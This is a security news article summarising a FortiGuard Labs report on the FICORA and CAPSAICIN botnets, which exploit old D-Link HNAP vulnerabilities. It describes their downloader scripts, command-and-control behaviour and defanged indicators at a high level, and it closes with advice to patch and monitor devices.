Surge in Botnet Activity Targets D-Link Vulnerabilities: A Focus on FICORA and CAPSAICIN

December 27, 2024

FortiGuard Labs researchers have noticed a sharp increase in activity associated with two botnets, FICORA and CAPSAICIN, both variants of Mirai and Kaiten respectively. These botnets are exploiting vulnerabilities in D-Link devices, specifically through the Home Network Administration Protocol (HNAP) interface, enabling the execution of remote commands. The vulnerabilities targeted by these botnets include CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.

According to Fortinet's report, 'According to our IPS telemetry, attackers frequently reuse older attacks, which accounts for the continued spread of the “FICORA” and “CAPSAICIN” botnets to victim hosts and infected targets.' The FICORA botnet's recent campaign has been widespread, indicating a lack of targeted attacks, while the CAPSAICIN botnet showed high activity levels for two days in October 2024, predominantly in East Asian countries.

The FICORA botnet operates by downloading and executing a shell script known as 'multi,' which is subsequently removed post-execution. This script employs various methods to download the malware, including 'wget,' 'ftpget,' 'curl,' and 'tftp.' It first terminates processes with the same file extension as 'FICORA' before downloading and executing the malware targeting multiple Linux architectures. The malware's configuration, including its command and control (C2) server domain and a unique string, is encrypted using the ChaCha20 algorithm. The scanner utilized by the FICORA botnet comes with a hard-coded username and password for its brute force attack function.

The CAPSAICIN botnet uses a downloader script ('bins.sh') with a different IP address ('87.10.220[.]221') to fetch the bot to target various Linux architectures. It eliminates known botnet processes to ensure it remains the only one running. It then connects to its C2 server ('192.110.247[.]46'), transmitting the victim's OS information and a unique nickname back to the server.

FortiGuard Labs concludes in their report that 'Although the weaknesses exploited in this attack had been exposed and patched nearly a decade ago, these attacks have remained continuously active worldwide... Because of this, it is crucial for every enterprise to regularly update the kernel of their devices and maintain comprehensive monitoring. These steps will help reduce the likelihood of malware being deployed through this vulnerability.'

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.